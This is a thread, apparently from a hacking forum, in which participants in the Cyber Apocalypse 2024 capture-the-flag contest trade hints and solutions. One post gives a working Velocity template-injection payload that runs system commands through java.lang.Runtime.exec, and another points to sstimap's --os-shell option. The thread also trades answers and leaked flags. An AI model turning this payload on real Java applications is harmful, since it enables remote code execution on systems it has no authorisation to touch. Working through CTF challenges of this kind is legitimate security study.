Mar 13, 2024, 08:46 PM
|
Cyber Apocalypse 2024
by Bendelladj1 - Saturday March 9, 2024 at 02:05 PM
|
|
Mar 13, 2024, 08:51 PM
(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote:(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing well it more than one command we need setup local variable and use streams for command output . also flag name contains random string. can trade for easy problem: Were Pickle Phreaks, Testimonial, Crushing, Blunt, Rids
Mar 13, 2024, 09:04 PM
(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote:(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing I do not have them unfortunately I am new here, please help
Mar 13, 2024, 09:15 PM
(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote:(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing Read part related to RCE https://antgarsil.github.io/posts/velocity/
Mar 13, 2024, 09:15 PM
(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote:(Mar 13, 2024, 08:43 PM)kenadamsiu Wrote: Any hints on Labyrinth Linguist? Used millions XSS and nothing https://github.com/vladko312/sstimap --os-shell will get you there
Mar 13, 2024, 09:30 PM
(Mar 13, 2024, 09:15 PM)xemyll Wrote:(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:46 PM)xemyll Wrote: SSTI in velocity template is this the answer #set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end ?
Mar 13, 2024, 09:32 PM
(Mar 13, 2024, 09:30 PM)kenadamsiu Wrote:(Mar 13, 2024, 09:15 PM)xemyll Wrote:(Mar 13, 2024, 09:04 PM)kenadamsiu Wrote:(Mar 13, 2024, 08:57 PM)xemyll Wrote:(Mar 13, 2024, 08:51 PM)kenadamsiu Wrote: ${#include("/flag.txt")}... I did this but got error what I need to do specifically? play a bit with .exec("whoami")
Mar 13, 2024, 09:34 PM
Looking for writeup for apexsurvive or percetron. Have basically everything else except ~10 challenges. DM me
|
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 385 | 95,701 |
51 minutes ago Last Post: rasa420 |
||
| [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot | 96 | 8,762 |
1 hour ago Last Post: rasa420 |
||
| [FREE] CPTS 12 FLAGS | 86 | 3,065 |
1 hour ago Last Post: Mr_root |
||
| [FREE] HackTheBox Academy - CAPE Path Study | 45 | 4,512 |
1 hour ago Last Post: BlazeFury |
||
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 29 | 2,685 |
7 hours ago Last Post: newuser201 |
||